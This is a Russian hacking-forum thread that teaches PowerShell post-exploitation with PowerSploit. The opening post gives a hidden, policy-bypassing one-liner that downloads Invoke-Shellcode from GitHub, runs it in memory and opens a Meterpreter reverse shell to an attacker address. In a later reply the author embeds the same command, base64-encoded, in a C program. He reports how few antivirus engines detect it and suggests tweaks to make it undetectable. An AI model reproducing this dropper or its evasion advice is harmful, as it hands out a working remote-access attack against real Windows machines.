PowerShell для хакера (часть I )

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Часть 1
Следующая часть
Все части

Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних.
И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем)

Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1

logo.png


Для начало сходим на гитхаб по ссылке:
Код:
https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1
1.PNG


Жмакним на клавишу RAW - что бы получить ссылку для скачивания в чистом виде
Код:
https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1
Эту ссылку мы потом используем для нашей команды PowerShell,а пока можно в скрипте в комментариях увидеть опциональные параметры и примеры для его запуска:

3.PNG


Копируем урл нашего скрипта и готовим следующую команду:
Код:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
-NoP (--NoProfile) Не использовать пфрофиль powershell
-NonI (--NonInteractive) Не использовать интерактивный режим
-W Hidden ( --Window Hidden) Не показывать окно командной строки
-Exec Bypass ( Bypass Execution Policy) Разрешить подгружать и использовать скрипты из внешних ресурсов
IEX(New-Object Net.WebClient).DownloadString('url нашего скрипта') - Выполнить скрипт путем загрузки его по урл из удаленного ресурса и загрузки его в памяти
Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.137.137 -Lport 1337 -Force
Собственно вызов нашего скрипта после его загрузки с параметрами (IP аддрес и порт Атакуещей машини) и тип пейлоада метасплоита.
5.PNG


6.PNG


Собственно говоря и все)

Запускаем данную команду и к нам прилетает метерпретер сессия)
Можно еще для удобства сократить урл к скрипту на гитхабе через сервисы сокращения ссылок)

Всем спасибо) Продолжения следует)

Следующая часть
Все части
 
добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?
 
  • Нравится
Реакции: Mixa и Vander
Неплохо.
Думаю такой скрипт с rubberducky должен "подружиться" :)
 
  • Нравится
Реакции: m0tion
я полагаю если удаленно создать правило в исключениях фаервола то получится или я опять не права ?o_O
 
Добрый день, ну не во всех же стоит Symantec Endpoint Protection,какие то скрипты будут пробиваться..)
 
Завтра сделаю тест на детект.Сорри сегодня не успеваю)
Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))
 
  • Нравится
Реакции: AidBotnet
Огромное спасибо за статью, искал нечто подобное.
 
Извините за редкий онлайн. Увлекся лабораторией тестирования на проникновения от PentestIT. После окончания прохождения вернусь к вам мои дорогие друзья)))
Пожалуйста напиши статью как проходил лабораторию.
 
  • Нравится
Реакции: 6otfa и <~DarkNode~>
Пожалуйста напиши статью как проходил лабораторию.
Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)
 
Могу посвятить небольшой цикл статей в виде врайтапов по каждому токену(флагу) от моментов подключения до последнего токена.Как пользоваться картой топологии сети, простую логику поиска векторов уязвимости, и т.д
Имхо такие лаборатории очень наглядно демонстрируют известные векторы атак,и полезно попрактиковаться на них,так как команда специалистов делая лаборатории подбирают наиболее актуальные уязвимости которые попадают в статистику пентестов текущего года.
Если кому то будет интересно,то конечно могу)
Если вы это сделаете, то я буду самым счастливым человеком на свете.
 
Снимок.PNG
добрый вечер.а если данный скрипт допустим встроить в софт, как с детектом антивирусов у его?
Тестанул вот на детект,весьма не плохо, 2/35 (правда аваспом палится) Но можно в принципе достич и фуда (FuD) если небольшие манипуляции сделать


C:
#include <stdlib.h>

int main() {
    system("powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADIALgAxADAAMgAgAC0ATABwAG8AcgB0ACAAMQAzADMANwAgAC0ARgBvAHIAYwBlAA==");
    return 0;
}
 
Последнее редактирование:
  • Нравится
Реакции: valerian38 и NSIS
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!